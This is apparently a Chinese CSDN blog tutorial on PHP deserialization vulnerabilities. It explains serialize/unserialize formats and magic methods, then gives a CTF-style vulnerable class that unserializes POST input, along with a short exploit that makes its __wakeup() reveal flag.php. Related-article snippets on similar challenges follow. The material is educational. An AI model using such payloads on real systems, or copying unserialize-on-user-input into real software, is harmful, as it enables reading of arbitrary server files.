php反序列化漏洞

最新推荐文章于 2022-08-09 14:35:33 发布
最新推荐文章于 2022-08-09 14:35:33 发布
阅读量328 收藏 1
点赞数
分类专栏: 信息安全 文章标签: 信息安全 php 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43680269/article/details/105595571
版权

序列化与反序列化

序列化:把对象转换为字节序列,用于保存

反序列化:把字节序列恢复为对象的过程

 

  1. 转换成统一的格式便于传输

  2. 保留对象的状态以及相关的描述信息

  3. 序列化机制的核心作用就是对象状态的保存与重建

反序列化本身不是漏洞,但是反序列化的参数可控就有可能导致漏洞

 

0x01  php的序列化与反序列化

 

Part 1 : serialize() 序列化

serialize 函数用于序列化数组或对象,并返回一个字符串。

简单来说,序列化就是把东西摆放整齐,比如:


<?php
$sites = array('a', 'bb', 'ccc');
$serialized_data = serialize($sites);
echo  $serialized_data;
?>

输出结果为:

a - array

b - boolean

d - double

i - integer

o - common object

r - reference

s - string

C - custom object

O - class

N - null

R - pointer reference

U - unicode string

 

a:3 有三个数组

i:0 第一个数组,s:1:"a",表示第一个数组是字符,1表示有两个字符,为"a"

i:1 第二个数组,s:2:"bb",表示第二个数组是字符,2表示有三个字符,为"bb"

i:2 第三个数组,s:3:"ccc",表示第三个数组是字符,3表示有三个字符,为"ccc"

 

放入对象也是类似的。

<?php

class name {

    var $test1;

    var $test2;

}

$test3 = new name;

$test3->test1 = 'hello';

$test3->test2 = '_world';

echo serialize($test3); 

输出结果:

 O:4 指Object(对象) 4个字符

"name":2  指对象属性个数为2

 {}  中为属性字符数:属性值 

 

Part 2 : unserialize() 反序列化

unserialize 函数用于反序列化生成字符串。

比如:

<?php

$sites = array('a', 'bb', 'ccc');

$serialized_data = serialize($sites);

$unserialized_data = unserialize($serialized_data);

print_r($unserialized_data);

?>

输出结果:

Array

(

    [0] =>  a

    [1] =>  bb

    [2] =>  ccc

)

这就是 PHP 的反序列化,返回原始的结构。

 

0x02反序列化漏洞

 

反序列化漏洞相关的,危险的 PHP 魔法函数,两个下划线开头。

__construct():当一个类被创建时自动调用

__destruct():当一个类被销毁时自动调用

__tostring():当把一个类当作字符串使用时自动调用

__wakeup():当调用unserialize()函数时自动调用

__sleep():当调用serialize()函数时自动调用

__get():当获得一个类的成员变量时自动调用

__set():当设置一个类的成员变量时自动调用

__invoke():当把一个类当作函数使用时自动调用

__call():当要调用的方法不存在或权限不足时自动调用

unserialize() 反序列化之后,会自动调用__ wakeup() ,因此最理想的情况就是一些漏洞/危害代码在 __wakeup()  中,从而当我们控制序列化字符串时可以去直接触发它们。

 

看一个简单的例子
 

<?php

// flag is in flag.php

class popdemo
{
    private $filename = 'demo.php';

    public function __wakeup()
    {
        // TODO: Implement __wakeup() method.

        $this->show($this->filename);
    }

    public function show($filename)
    {
        show_source($filename);
    }

}

unserialize($_POST['a']);//调用__wakeup()

exp:(漏洞利用代码)

<?php

class popdemo

{

private $filename = "flag.php";

}

$p = new popdemo();

var_dump(urlencode(serialize($p)));

运行之后得到flag.php

 

更多信息安全教程(upload-labs靶场笔记  SQL注入 新手向入门系列教程)

尽在蝰蛇安全实验室(微信公众号)呦

我们专注于打造清晰准确 新手友好的信息安全公众号

期待您的关注与支持

wildsea_
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
GWHT
weixin_45689999的博客
06-06 716
1.wake_up <?php // flag is in flag.php highlight_file(__FILE__); class FILE { private $file = "fl4g.php"; public function __construct($file) { $this->file = $file; } function __destruct(){ echo highlight_file($th
POP链入门
cxiaodi的博客
06-11 181
【代码】POP链入门。
PHP序列序列漏洞
CyhDl666的博客
01-30 625
文章目录序列序列数组序列对象序列序列漏洞+实例_wakeup()漏洞的绕过攻防世界:unserialize3攻防世界:Web_php_unserialize函数同名方法利用session利用 序列 序列数组 serialize()函数可以序列对象和数组返回一个字符串 序列数组 <?php $sites = array('Google', 'Runoob', 'Facebook'); $serialized_data = serialize($sites); echo $ser
php 序列漏洞
good good study
01-09 5328
什么是序列 序列即 将对象的状态信息转换为可以存储或传输的形式的过程 在序列期间,对象将其当前状态写入到临时或持久性存储区。以后,可以通过从存储区中读取或序列对象的状态,重新创建该对象 简单来说,序列就是把一个对象变成可以传输的字符串,可以以特定的格式在进程之间跨平台、安全的进行通信 。 序列分为PHP序列和java序列,下面就以PHP序列漏洞为切入点,讲述序列漏洞核心的原理,其他Java、Python等语言的序列漏洞,其原理基本相通。 PHP中的序列序列
云计算安全漏洞及其对策(一)
DynmicResource的博客
06-17 352
theme: orange 持续创作,加速成长!这是我参与「掘金日新计划 · 6 月更文挑战」的第22天,点击查看活动详情 ???? 个人主页:@青Cheng序员石头 上云后,是否不确定如何保护自己免受云计算安全漏洞的影响? 前言 云基础设施可能很复杂,我们都知道复杂性是安全的敌人。尽管大多数云安全专家都认为,公司可以从内置于云中的安全解决方案中获益,但企业也可能犯下严重错误...
PHP序列漏洞研究
06-17
PHP序列漏洞研究 PHP序列漏洞是指攻击者可以通过构造恶意的序列数据来执行恶意代码或泄露敏感信息的漏洞。这种漏洞通常发生在使用PHP的serialize()和unserialize()函数时。 在PHP中,serialize()函数...
PHP序列漏洞详解.rar
02-07
在IT安全领域,PHP序列漏洞是一种常见的安全隐患,尤其在Web应用开发中。这个话题在CTF(Capture The Flag)网络安全竞赛中也常被用作挑战,因为理解和利用这种漏洞需要深入理解PHP语言和其内部工作原理。下面将...
PHP序列漏洞.pdf
08-10
**PHP序列漏洞详解** PHP序列漏洞是一种常见的安全漏洞,主要出现在PHP应用程序中,当程序在处理用户可控的序列数据时,没有进行有效的验证和过滤,导致攻击者能够操纵序列的数据,从而执行任意代码...
php序列漏洞1
08-04
修改 test.php,到达命令执行来的 phpinfo 覆盖了,但是并没有传入 file 文件名覆盖原来的 file 文件名)(O 是指对象,2 是后面 AA
PHP代码审计12—序列漏洞
W0ngk,一个安全菜鸡,一直在模仿,尚未有超越。
08-09 1395
PHP序列入门
CTF/CTF练习平台-flag在index里【php://filter的利用】
热门推荐
Sp4rkW的博客
08-20 4万+
原题内容: http://120.24.86.145:8005/post/ Mark一下这道题,前前后后弄了两个多小时,翻了一下别的博主的wp感觉还是讲的太粗了,这里总结下自己的理解: 首先打开这道题,页面只给你click me? no 点击进去显示test5 第一步,查看源代码,无果 第二步bp,无果 结合到题目,flag在index里,大胆尝试http://12...
PHP序列漏洞总结
坚持硬核
10-07 1万+
一、什么是序列? 将php中 对象、类、数组、变量、匿名函数等,转为字符串,方便保存到数据库或者文件中。而序列就是将这个过程倒过来。 当在php中创建了一个对象后,可以通过serialize()把这个对象变成一个字符串,保存对象的值方便以后传递使用。 <?php class A{ public $test = 123; } $a = new A; $a_ser=ser...
flag就在flag.php,flag就在flag.php
weixin_35355431的博客
03-11 2190
Web1题目地址1.访问题目存在一个登录界面2.注册一个用户登录,然后会跳转到另一个界面,会给出一些提示3.访问flag.php,试试可不可以得到flag提示admin可以得到flag,然后跳转回登录界面,猜测这和Cookie是有关的4.抓包发现在Cookie里有username,而且每一个用户的username是不一样的,后面的值是base64加密之后的在登录成功跳转的那个页面还有一个修改密码的...
CTF-06
渗透笔记
01-19 605
题目说明:get flag1.打开链接,页面如下 2.点击Login,页面如下,是个登陆页面,有一个加密的验证码,验证码为对其进行md5加密后取前六位等于页面给定的这个字符串 3.编写python脚本,跑验证码import hashlibdef md5(str): m = hashlib.md5() m.update(str) q = m.hexdigest()
PHP序列序列漏洞总结(一篇懂)
qq_45521281的博客
05-03 7693
文章目录序列序列的概念与基础知识PHP序列访问控制修饰符PHP序列PHP序列漏洞(常规)__wakeup()__destruct()示例一:示例二(连菜刀、序列免杀后门):__toString()Error类ExceptionPHP中Session序列(重点)简介与基础知识Session序列漏洞利用PHP Session中的序列危害实际利用CTF例题 序列...
[MRCTF2020]Ezpop 1
shinygod的博客
03-28 1362
知识点:各种魔术方法,以及构造序列pop链子的思路 <?php //flag is in flag.php class Modifier { protected $var="php://filter/resource=flag.php"; public function append($value){ include($value);//漏洞利用点 } public function __invoke(){ //在类被当作函数调用
某web题 初次接触序列
weixin_43928140的博客
05-13 1013
记录菜鸡生活的第五天02 首先打开题目 先抓个包看下 看到这个,应该是说username这个东西他要经过md5加密,并且是0开头的字符串,所以我们先百度一个数在md5加密后符合要求的输进去 登进去之后发现是代码审计了 $unserialize_str = $_POST['password']; $data_unserialize = unserialize($unserialize_s...
网鼎杯之php序列 AreUserialz
weixin_54431413的博客
04-16 2209
2020网鼎杯的php序列AreUserialz
php序列漏洞习题
最新发布
09-06
关于PHP序列漏洞的习题,可以使用GlobIterator类和ArrayObject类来进行练习。其中,GlobIterator类的题目是被遗忘的序列,ArrayObject类的题目是easy_phpPHP序列漏洞是一种安全漏洞,其中一个具体的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值